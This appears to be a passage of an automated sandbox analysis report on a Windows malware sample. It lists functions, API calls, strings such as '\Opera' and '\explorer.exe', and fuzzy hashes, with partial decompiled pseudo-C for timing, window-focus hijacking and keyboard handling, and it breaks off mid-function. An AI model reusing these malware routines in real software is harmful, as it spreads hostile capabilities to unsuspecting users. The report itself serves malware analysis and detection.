0x00c61b7f
0x00c61b84
0x00c61b8b
0x00c61b8e
0x00000000
0x00000000
0x00c61b9e
0x00c61ba1
0x00c61ba6
0x00c61bad
0x00c61bb0
0x00000000
0x00000000
0x00c61bb6
0x00c61bb6
0x00c61bb8
0x00000000
0x00c61bb8
0x00c61b32
0x00c61b39
0x00000000
0x00000000
0x00c61b3b
0x00c61b42
0x00000000
0x00000000
0x00000000
0x00c61a02
0x00c61a02
0x00c61a02
0x00c61cb1
0x00c61cc7
0x00c61cc7

APIs

memcpy.NTDLL(?,00000000,00001644,?,?,00C6175C), ref: 00C61AA1
memcpy.NTDLL(?,00000000,00001644,?,?,00C6175C), ref: 00C61ACA
memcpy.NTDLL ref: 00C61C5C

Strings

LdrLoadDll, xrefs: 00C61B51, 00C61BF9
NTDLL.DLL, xrefs: 00C61B44
LdrGetProcedureAddress, xrefs: 00C61B72, 00C61C14
NTDLL.DLL, xrefs: 00C61BDF
NtProtectVirtualMemory, xrefs: 00C61B94, 00C61C2F

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memcpy
String ID: LdrGetProcedureAddress$LdrLoadDll$NTDLL.DLL$NTDLL.DLL$NtProtectVirtualMemory
API String ID: 3510742995-2923435655
Opcode ID: 3f1cffd34a13ac728c0ddd1c75c759440b581e5ccda2ef14251662932a17911c
Instruction ID: 4c835d3b000ceab888bcb536ee7c0ab8bbfae591ce2562ce1a71d2a731dc3206
Opcode Fuzzy Hash: 3f1cffd34a13ac728c0ddd1c75c759440b581e5ccda2ef14251662932a17911c
Instruction Fuzzy Hash: EC81BCB5301F4096FF25CF56E894BA933A1FB487A9F880625ED2947714EF38C618C344

Uniqueness

Uniqueness Score: -1.00%

Function 00C7784C, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 80stringmemoryCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,?,00C63740), ref: 00C7787E
StrRChrA.SHLWAPI(?,?,?,00C63740), ref: 00C77890
_strnicmp.NTDLL ref: 00C778BE
HeapAlloc.KERNEL32(?,?,?,00C63740), ref: 00C778E2
SetLastError.KERNEL32(?,?,?,00C63740), ref: 00C778F3
memcpy.NTDLL(?,?,?,00C63740), ref: 00C77906
lstrcpyA.KERNEL32(?,?,?,00C63740), ref: 00C77912
lstrcmpiA.KERNEL32(?,?,?,00C63740), ref: 00C77922
lstrcatA.KERNEL32(?,?,?,00C63740), ref: 00C77936
lstrcatA.KERNEL32(?,?,?,00C63740), ref: 00C77942

Strings

Default, xrefs: 00C77918

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$AllocErrorHeapLast_strnicmplstrcmpilstrcpylstrlenmemcpy
String ID: Default
API String ID: 2130173156-753088835
Opcode ID: 6e43100410e76e44178096203c499ac02f105e119f4743cddb5a0befb338392e
Instruction ID: 7093c79bf6a6d24d469180c8f175ff84894ce898a44b883f3b79b2217e678527
Opcode Fuzzy Hash: 6e43100410e76e44178096203c499ac02f105e119f4743cddb5a0befb338392e
Instruction Fuzzy Hash: 7B318DA5301A8585EA14DF23E854B59B3A1FB89FD0F88C225CE5E47B64EF3CD54AC704

Uniqueness

Uniqueness Score: -1.00%

Function 00C80890, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 77stringmemoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00C808B9
lstrlenW.KERNEL32 ref: 00C808E2
lstrlenW.KERNEL32 ref: 00C808F7
HeapAlloc.KERNEL32 ref: 00C8090C
lstrcpyW.KERNEL32 ref: 00C80924
lstrcatW.KERNEL32 ref: 00C80939
lstrcatW.KERNEL32 ref: 00C80945
CloseHandle.KERNEL32 ref: 00C80993
CloseHandle.KERNEL32 ref: 00C8099E
HeapFree.KERNEL32 ref: 00C809B0

Strings

h, xrefs: 00C808D2

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseHandleHeaplstrcatlstrlen$AllocFreelstrcpymemset
String ID: h
API String ID: 916770911-2439710439
Opcode ID: d4a323cd91a2d61c9d604e931f1f4f61badf3ab68832d48115016ebed7410c1a
Instruction ID: e1ee91b64d6400a321d8e5dade937f45e63c7c29948d7878445fc8de1bb69bbd
Opcode Fuzzy Hash: d4a323cd91a2d61c9d604e931f1f4f61badf3ab68832d48115016ebed7410c1a
Instruction Fuzzy Hash: F2311A36204F8086EB20DF26F85475AB3A5F7C8FD4F958125DA8A47B28DF78C54ACB04

Uniqueness

Uniqueness Score: -1.00%

Function 00C63780, Relevance: 18.2, APIs: 12, Instructions: 180stringmemoryCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32 ref: 00C63811
MultiByteToWideChar.KERNEL32 ref: 00C6385E
lstrlenA.KERNEL32 ref: 00C638AF
lstrlenA.KERNEL32 ref: 00C638C1
HeapAlloc.KERNEL32 ref: 00C638D6
lstrcpyA.KERNEL32 ref: 00C638FC
lstrcatA.KERNEL32 ref: 00C6390C
lstrcatA.KERNEL32 ref: 00C63919
HeapFree.KERNEL32 ref: 00C63987

Part of subcall function 00C7784C: lstrlenA.KERNEL32(?,?,?,00C63740), ref: 00C7787E
Part of subcall function 00C7784C: StrRChrA.SHLWAPI(?,?,?,00C63740), ref: 00C77890
Part of subcall function 00C7784C: _strnicmp.NTDLL ref: 00C778BE
Part of subcall function 00C7784C: HeapAlloc.KERNEL32(?,?,?,00C63740), ref: 00C778E2
Part of subcall function 00C7784C: SetLastError.KERNEL32(?,?,?,00C63740), ref: 00C778F3

HeapFree.KERNEL32 ref: 00C639A1
HeapFree.KERNEL32 ref: 00C639C6
SetLastError.KERNEL32 ref: 00C639D2

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$lstrlen$Free$AllocErrorLastlstrcat$ByteCharMultiWide_strnicmplstrcpy
String ID:
API String ID: 2865314823-0
Opcode ID: 0dac1df1654789e0e6ca1ab8e3738428ddf44d81534edbe49ee50370b3280ddd
Instruction ID: 3bd1a30fba255c0dd0a00798f8d202e3c5e9c395314e5a46bcfddffcf390d16b
Opcode Fuzzy Hash: 0dac1df1654789e0e6ca1ab8e3738428ddf44d81534edbe49ee50370b3280ddd
Instruction Fuzzy Hash: 3B718336201FC186EB25CF66E88079937A0F788FA8F488616EE6D47B58DF78C645C744

Uniqueness

Uniqueness Score: -1.00%

Function 00C82BBC, Relevance: 18.2, APIs: 12, Instructions: 157
COMMON

Download Yara Rule

C-Code - Quality: 15%

			E00C82BBC(void* __ebx, void* __ecx, void* __edx, void* __rax, void* __r9, void* _a8, void* _a16, void* _a24, long long _a32) {
				void* _v48;
				void* _v56;
				signed int _v64;
				void* _v72;
				long long _v88;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				long _t50;
				signed int _t54;
				signed int _t63;
				signed short _t64;
				long _t65;
				signed int _t66;
				long _t70;
				signed short _t72;
				signed short _t82;
				void* _t83;
				signed int _t101;
				long long _t102;
				signed long long _t110;
				signed int _t111;
				signed long long _t122;
				void* _t123;
				long long _t124;
				void* _t125;
				void* _t126;
				long long _t131;
				signed long long _t132;
				long long _t136;
				intOrPtr* _t137;
				long long _t140;

				_t125 = _t126;
				r14d = 0;
				_t83 =  *0xc95914 - r14d; // 0x0
				if(_t83 == 0) {
					EnterCriticalSection();
					_t101 =  *0xc958c8; // 0x0
					_t82 =  *0xc958fc; // 0x0
					 *0xc95914 = 1;
					_t50 = GetTickCount();
					asm("btr eax, 0x1f");
					__eflags = _t50 -  *0xc958c0 - 0xc8;
					if(_t50 -  *0xc958c0 > 0xc8) {
						GetSystemTimeAsFileTime();
						__eflags = _t101;
						if(_t101 != 0) {
							_t122 = _v64 - _t101;
							E00C82AC8(_t101,  &_a16,  &_a8, _t123, _t125,  &_a24);
							GetCurrentProcess();
							_v88 =  &_v72;
							_t54 = GetProcessTimes(??, ??, ??, ??, ??);
							_t102 = _a8;
							_t124 = _a24;
							_t140 = _a16;
							_t110 = _t102 -  *0xc958e0 -  *0xc958d8 + _t124;
							__eflags = _t110;
							if(_t110 == 0) {
								r10d = r14d;
							} else {
								asm("dec eax");
								_t54 = _t54 / _t110;
							}
							_t136 = _a32;
							_t131 = _v72;
							_t111 = _v64;
							 *0xc958f0 = _t131;
							_t132 =  *0xc958f8;
							asm("dec eax");
							 *0xc958e8 = _t136;
							 *(0xc95900 + _t132 * 4) = r10d;
							_t137 = 0xc95918;
							 *(0xc95918 + _t132 * 4) = _t54 / _t122;
							r8d = r8d + 1;
							 *0xc958c8 = _t111;
							 *0xc958d0 = _t140;
							 *0xc958d8 = _t102;
							 *0xc958e0 = _t124;
							r8d =  *0xc958c4; // 0x0
							r8d = r8d + 1;
							 *0xc958f8 = 0x3256400 + (_t136 -  *0xc958f0 -  *0xc958e8 + _t131) * 0x64;
							__eflags = r8d - 5;
							r8d =  >  ? 5 : r8d;
							_t63 = r14d;
							 *0xc958c4 = r8d;
							__eflags = r8d;
							if(r8d > 0) {
								do {
									_t63 = _t63 +  *_t137;
									_t137 = _t137 + 4;
									_t111 = _t111 - 1;
									__eflags = _t111;
								} while (_t111 != 0);
							}
							asm("cdq");
							_t64 = _t63 / r8d;
							_t72 = _t64;
							 *0xc958fc = _t64;
							_t65 = GetTickCount();
							__eflags =  *0xc95914 - r14d; // 0x0
							 *0xc958c0 = _t65;
							if(__eflags != 0) {
								LeaveCriticalSection();
							}
							_t66 = _t72 & 0x0000ffff;
						} else {
							E00C82AC8(_t101,  &_a16,  &_a8, _t123, _t125,  &_a24);
							GetCurrentProcess();
							_v88 =  &_v72;
							GetProcessTimes(??, ??, ??, ??, ??);
							 *0xc958c8 = _v64;
							 *0xc958d0 = _a16;
							 *0xc958d8 = _a8;
							 *0xc958e0 = _a24;
							 *0xc958e8 = _a32;
							 *0xc958f0 = _v72;
							 *0xc958fc = r14d;
							_t70 = GetTickCount();
							__eflags =  *0xc95914 - r14d; // 0x0
							 *0xc958c0 = _t70;
							if(__eflags != 0) {
								LeaveCriticalSection();
							}
							_t66 = r14w & 0xffffffff;
						}
					} else {
						__eflags =  *0xc95914 - r14d; // 0x0
						if(__eflags != 0) {
							LeaveCriticalSection();
						}
						_t66 = _t82 & 0x0000ffff;
					}
					 *0xc95914 = r14d;
				} else {
					_t66 =  *0xc958fc & 0x0000ffff;
				}
				return _t66;
			}

0x00c82bc3
0x00c82bca
0x00c82bcd
0x00c82bd4
0x00c82be9
0x00c82bef
0x00c82bf6
0x00c82bfc
0x00c82c06
0x00c82c12
0x00c82c16
0x00c82c1b
0x00c82c3f
0x00c82c51
0x00c82c54
0x00c82cfb
0x00c82cfe
0x00c82d03
0x00c82d18
0x00c82d21
0x00c82d27
0x00c82d2b
0x00c82d40
0x00c82d44
0x00c82d44
0x00c82d47
0x00c82d64
0x00c82d49
0x00c82d5a
0x00c82d5c
0x00c82d5f
0x00c82d67
0x00c82d6b
0x00c82d80
0x00c82d8b
0x00c82d92
0x00c82d99
0x00c82da5
0x00c82dac
0x00c82db0
0x00c82db7
0x00c82dbb
0x00c82dc3
0x00c82dcd
0x00c82dd8
0x00c82de4
0x00c82def
0x00c82df9
0x00c82dfc
0x00c82e07
0x00c82e0a
0x00c82e0e
0x00c82e11
0x00c82e18
0x00c82e1b
0x00c82e20
0x00c82e20
0x00c82e23
0x00c82e27
0x00c82e27
0x00c82e27
0x00c82e20
0x00c82e2d
0x00c82e2e
0x00c82e31
0x00c82e33
0x00c82e39
0x00c82e3f
0x00c82e46
0x00c82e4c
0x00c82e55
0x00c82e55
0x00c82e5b
0x00c82c5a
0x00c82c5a
0x00c82c5f
0x00c82c74
0x00c82c7d
0x00c82c8b
0x00c82c96
0x00c82ca1
0x00c82cac
0x00c82cb7
0x00c82cbe
0x00c82cc5
0x00c82ccc
0x00c82cd2
0x00c82cd9
0x00c82cdf
0x00c82ce8
0x00c82ce8
0x00c82cee
0x00c82cee
0x00c82c1d
0x00c82c1d
0x00c82c24
0x00c82c2d
0x00c82c2d
0x00c82c33
0x00c82c33
0x00c82e5e
0x00c82bd6
0x00c82bd6
0x00c82bd6
0x00c82e6f

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,000001F4,00000000,?,?,00C7D620), ref: 00C82BE9
GetTickCount.KERNEL32 ref: 00C82C06
LeaveCriticalSection.KERNEL32(?,?,?,?,?,000001F4,00000000,?,?,00C7D620), ref: 00C82C2D

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CriticalSection$CountEnterLeaveTick
String ID:
API String ID: 1056156058-0
Opcode ID: c9207bd5d471b2d5ba5cf15d52233398a328010f6bfbbce1402242223c7c10cb
Instruction ID: 04e71abd7509acfe12d3387db0ef5e6591d0c606d57450d5646cbc609298740f
Opcode Fuzzy Hash: c9207bd5d471b2d5ba5cf15d52233398a328010f6bfbbce1402242223c7c10cb
Instruction Fuzzy Hash: 98717C31251F54C9FB12EF65E848BA833B4F748B99F840226E94D53BA0DF38C65AC748

Uniqueness

Uniqueness Score: -1.00%

Function 00C7C170, Relevance: 18.1, APIs: 12, Instructions: 103
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E00C7C170(void* __eflags, unsigned int __rax, long long __rbx, void* __rcx, unsigned long long __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, long _a8, long long _a16, long long _a24, long long _a32) {
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				int _t21;
				long _t22;
				long _t41;
				unsigned long long _t56;
				unsigned long long _t58;
				void* _t83;
				unsigned long long _t87;
				void* _t93;

				_t93 = __r9;
				_t60 = __rcx;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t4 = _t60 + 0x88; // 0x88
				_t94 = _t4;
				_t83 = __rcx;
				_t58 = __rdx;
				_t21 = E00C7C050(__rax, __rdx, _t4, __rdx, __rcx);
				r15d = 0;
				if(_t21 != 0) {
					_a8 = r15d;
					_t41 = r15d;
					__imp__GetWindowLongPtrA();
					_t56 = __rax >> 0x1e;
					if((_t21 & 0x00000001) != 0) {
						GetAncestor();
						_t58 = _t56;
					}
					_t21 = E00C7F480(_t58, _t83);
					_t87 = _t56;
					if(_t56 != _t58) {
						_t21 = E00C7B764(_t56, _t58, _t58);
						if(_t21 != 0) {
							_t21 = E00C7BB64(_t56, _t58, _t94, _t58, _t93);
							_t48 = _t21 & 0x00000015;
							if((_t21 & 0x00000015) == 0) {
								_t22 = GetWindowThreadProcessId();
								r9d = r15w & 0xffffffff;
								_v56 = 1;
								_t92 = _t58;
								E00C78CFC(_t22, _t48, _t56, _t58, _t83, _t87, _t58);
								if(_t87 != 0) {
									_t41 = GetWindowThreadProcessId();
								}
								GetCurrentThreadId();
								if(_t41 != 0) {
									r8d = 1;
									AttachThreadInput(??, ??, ??);
								}
								BringWindowToTop();
								SetForegroundWindow(??);
								SetActiveWindow(??);
								_t21 = SetFocus(??);
								if(_t41 != 0) {
									r8d = 0;
									_t21 = AttachThreadInput(??, ??, ??);
								}
								if( *((intOrPtr*)(_t83 + 0x1dc)) != r15d) {
									_v40 = 3;
									r9d = 0;
									_v48 = r15d;
									r8d = 0;
									_v56 = r15d;
									SetWindowPos(??, ??, ??, ??, ??, ??, ??);
									r8d = 1;
									_t21 = E00C82424(0, _t56, _t58, _t83, _t58, _t83, _t87, _t92, _t93);
									E00C7F4BC();
								}
							}
						}
					}
				}
				return _t21;
			}

0x00c7c170
0x00c7c170
0x00c7c170
0x00c7c175
0x00c7c17a
0x00c7c188
0x00c7c188
0x00c7c18f
0x00c7c195
0x00c7c198
0x00c7c19d
0x00c7c1a2
0x00c7c1ac
0x00c7c1b4
0x00c7c1b7
0x00c7c1bd
0x00c7c1c3
0x00c7c1cc
0x00c7c1d2
0x00c7c1d2
0x00c7c1d8
0x00c7c1dd
0x00c7c1e3
0x00c7c1ec
0x00c7c1f3
0x00c7c1ff
0x00c7c204
0x00c7c206
0x00c7c211
0x00c7c217
0x00c7c21b
0x00c7c225
0x00c7c22b
0x00c7c233
0x00c7c243
0x00c7c243
0x00c7c245
0x00c7c24f
0x00c7c251
0x00c7c25b
0x00c7c25b
0x00c7c264
0x00c7c26d
0x00c7c276
0x00c7c27f
0x00c7c287
0x00c7c289
0x00c7c290
0x00c7c290
0x00c7c29d
0x00c7c29f
0x00c7c2a7
0x00c7c2aa
0x00c7c2af
0x00c7c2b4
0x00c7c2bc
0x00c7c2c2
0x00c7c2ce
0x00c7c2d9
0x00c7c2d9
0x00c7c29d
0x00c7c206
0x00c7c1f3
0x00c7c1e3
0x00c7c2f6

APIs

Part of subcall function 00C7C050: IsWindow.USER32 ref: 00C7C06A
Part of subcall function 00C7C050: GetAncestor.USER32(?,?,?,00C7C19D), ref: 00C7C093

GetWindowLongPtrA.USER32 ref: 00C7C1B7
GetAncestor.USER32 ref: 00C7C1CC
GetWindowThreadProcessId.USER32 ref: 00C7C211
GetWindowThreadProcessId.USER32 ref: 00C7C23D
GetCurrentThreadId.KERNEL32 ref: 00C7C245
AttachThreadInput.USER32 ref: 00C7C25B
BringWindowToTop.USER32 ref: 00C7C264
SetForegroundWindow.USER32 ref: 00C7C26D
SetActiveWindow.USER32 ref: 00C7C276
SetFocus.USER32 ref: 00C7C27F
AttachThreadInput.USER32 ref: 00C7C290
SetWindowPos.USER32 ref: 00C7C2BC

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$Thread$AncestorAttachInputProcess$ActiveBringCurrentFocusForegroundLong
String ID:
API String ID: 371883717-0
Opcode ID: 10649c7a0e31fef9d2295e9d769231f318eda589397cbca78c3a5e95fd14270a
Instruction ID: ed59abd83f230f79998db8972808043d64a4d13d9546d4e9e01910352be69200
Opcode Fuzzy Hash: 10649c7a0e31fef9d2295e9d769231f318eda589397cbca78c3a5e95fd14270a
Instruction Fuzzy Hash: C731707534474187EA24AF26B854B6A63A1F789FC0F888538EE5A47B1ADF3CC5468704

Uniqueness

Uniqueness Score: -1.00%

Function 00C7A500, Relevance: 18.1, APIs: 12, Instructions: 101stringmemoryCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A52B
GetLastError.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A537
HeapAlloc.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A555
GetTempPathW.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A56D
GetLongPathNameW.KERNEL32 ref: 00C7A592
lstrcatW.KERNEL32 ref: 00C7A5B2
lstrcatW.KERNEL32 ref: 00C7A623
lstrcatW.KERNEL32 ref: 00C7A638
lstrcatW.KERNEL32 ref: 00C7A644
HeapFree.KERNEL32(?,?,?,00000000,00000000,00C766DF), ref: 00C7A661

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$Path$HeapTemp$AllocErrorFreeLastLongName
String ID:
API String ID: 1976455836-0
Opcode ID: ddae719c9a5d7962ce315601e1fdb482d6a7b000abb518de9e8f0829f40fc914
Instruction ID: ec059921d5aaef19e0b696885390f8361704f74784bcb2c05018b303a40e54f5
Opcode Fuzzy Hash: ddae719c9a5d7962ce315601e1fdb482d6a7b000abb518de9e8f0829f40fc914
Instruction Fuzzy Hash: 8F418F72301B4186EB249F22AC54B696365BB88FE4F48C325ED2E43BA8DF38C5598705

Uniqueness

Uniqueness Score: -1.00%

Function 00C7797C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82stringmemoryCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00C63778), ref: 00C779A9
StrRChrW.SHLWAPI(?,?,?,00C63778), ref: 00C779BB
HeapAlloc.KERNEL32(?,?,?,00C63778), ref: 00C77A10
SetLastError.KERNEL32(?,?,?,00C63778), ref: 00C77A21
memcpy.NTDLL(?,?,?,00C63778), ref: 00C77A3B
wsprintfW.USER32 ref: 00C77A4E
lstrcmpiW.KERNEL32(?,?,?,00C63778), ref: 00C77A61
lstrcatW.KERNEL32 ref: 00C77A75
lstrcatW.KERNEL32 ref: 00C77A81

Strings

Default, xrefs: 00C77A57

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$AllocErrorHeapLastlstrcmpilstrlenmemcpywsprintf
String ID: Default
API String ID: 623154198-753088835
Opcode ID: fd863ade63e4c1d0fb5bbe1878f995c75349ce149d4469463f37fac87902852a
Instruction ID: d948d89bef76392ac528953d62802ce42c389ccec5571595133bc2bec534382e
Opcode Fuzzy Hash: fd863ade63e4c1d0fb5bbe1878f995c75349ce149d4469463f37fac87902852a
Instruction Fuzzy Hash: 34318E65304B8585FA24DB13ED44BA96761AB88FE0F88D225DD1E47B24EE3CC645C704

Uniqueness

Uniqueness Score: -1.00%

Function 00C770A8, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,00000000,00C77052), ref: 00C770D5
GetEnvironmentVariableW.KERNEL32(00000000,00000000,00000000,00C77052), ref: 00C770E5
GetLastError.KERNEL32 ref: 00C770F2
HeapAlloc.KERNEL32 ref: 00C77112
GetEnvironmentVariableW.KERNEL32 ref: 00C7712E
lstrcatW.KERNEL32 ref: 00C77143
lstrcatW.KERNEL32 ref: 00C77153
GetLastError.KERNEL32 ref: 00C7716B
HeapFree.KERNEL32 ref: 00C7717F

Strings

\Opera, xrefs: 00C77149

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnvironmentErrorHeapLastVariablelstrcat$AllocFreelstrlen
String ID: \Opera
API String ID: 3093186349-313673050
Opcode ID: 554bb047b9f55351cd3b17b0eb4ed385cd75424c7a8c42595613cf445ea150c1
Instruction ID: 211e6fd809844ffa832c3bce0d69ee43db9a62a4100ab0cdc91feb9b262bed06
Opcode Fuzzy Hash: 554bb047b9f55351cd3b17b0eb4ed385cd75424c7a8c42595613cf445ea150c1
Instruction Fuzzy Hash: CB21C331304B5586FB14DF67AD54B2A63A1BB89FE0F88C220DD0A43F25DF38C84A8704

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E5CC, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 72memorystringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00C7E5FA
GetSystemWindowsDirectoryA.KERNEL32 ref: 00C7E603
HeapAlloc.KERNEL32 ref: 00C7E624
GetSystemWindowsDirectoryA.KERNEL32 ref: 00C7E63B
lstrcatA.KERNEL32 ref: 00C7E64E
GetLastError.KERNEL32 ref: 00C7E6A5

Strings

\explorer.exe, xrefs: 00C7E641
h, xrefs: 00C7E65B

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DirectorySystemWindows$AllocErrorHeapLastlstrcatmemset
String ID: \explorer.exe$h
API String ID: 908777495-2845133803
Opcode ID: b9e6b49cb317998a65c80cfb4e8d24276eb097ca682b7a4754b78e285afaddb2
Instruction ID: 8988325d7f48527f997d65efbb18751520a361616bcfb0a0601f2333bfcf3e95
Opcode Fuzzy Hash: b9e6b49cb317998a65c80cfb4e8d24276eb097ca682b7a4754b78e285afaddb2
Instruction Fuzzy Hash: 80318E36304B85C6E720DF26E89475A77A5F788B94F548226EB8E43B64DF38D809C740

Uniqueness

Uniqueness Score: -1.00%

Function 00C81508, Relevance: 16.8, APIs: 11, Instructions: 290
windowkeyboardtimeCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E00C81508(long long __rbx, void* __rcx, intOrPtr* __rdx, void* __r8, signed long long __r9) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				long _t92;
				signed int _t100;
				signed short _t103;
				signed short _t110;
				signed int _t112;
				signed int _t115;
				long _t117;
				signed int _t128;
				signed int _t145;
				signed int _t146;
				intOrPtr _t188;
				void* _t194;
				signed long long _t198;
				intOrPtr _t201;
				signed long long _t215;
				intOrPtr* _t216;
				void* _t220;
				signed long long _t222;
				signed long long _t224;
				void* _t227;
				signed long long _t229;
				signed long long _t230;
				void* _t231;
				void* _t233;
				signed long long _t236;
				intOrPtr* _t243;
				signed long long _t245;
				signed long long _t246;
				signed long long _t248;

				_t236 = __r9;
				_t233 = __r8;
				_t217 = __rdx;
				_t187 = _t230;
				 *((long long*)(_t187 + 8)) = __rbx;
				 *((long long*)(_t187 + 0x10)) = __rdx;
				_push(_t227);
				_push(_t222);
				_push(_t220);
				_push(_t246);
				_push(_t248);
				_t231 = _t230 - 0x60;
				r15d = 0;
				_t194 = __rcx;
				 *((intOrPtr*)(_t187 + 0x20)) = r15w;
				r14d = r9d;
				_t146 = r8d;
				_t243 = __rdx;
				_t145 = r15d;
				asm("dec eax");
				_t224 =  !_t222 & 0xc0000000;
				_t92 = E00C7BEC4();
				 *(_t231 + 0x40) = _t92;
				_t198 = 0xc95500;
				_t128 = r15d;
				while( *_t198 != _t146) {
					_t128 = _t128 + 1;
					_t198 = _t198 + 4;
					if(_t128 < 3) {
						continue;
					}
					if(_t227 - 0x20 <= 0x5e || _t227 - 0xa0 <= 0x5f) {
						L11:
						r12d = E00C813A4(_t146, _t128, _t194, _t198, _t233, _t236) & 0x0000ffff;
						_t117 = GetWindowThreadProcessId(??, ??);
						GetKeyboardLayout(??);
						_t15 = _t231 + 0xb8; // 0xff70
						_t234 = _t15;
						 *(_t231 + 0x48) = _t187;
						E00C81158(r12w & 0xffffffff, _t194, _t187, _t224, _t227, _t15);
						 *(_t231 + 0x50) = _t187;
						_t229 = _t187;
						if(_t145 != 0) {
							L38:
							if(r14d != 0) {
								r8d = r14d;
								E00C81978(_t117, _t145, _t187, _t194, _t217);
							}
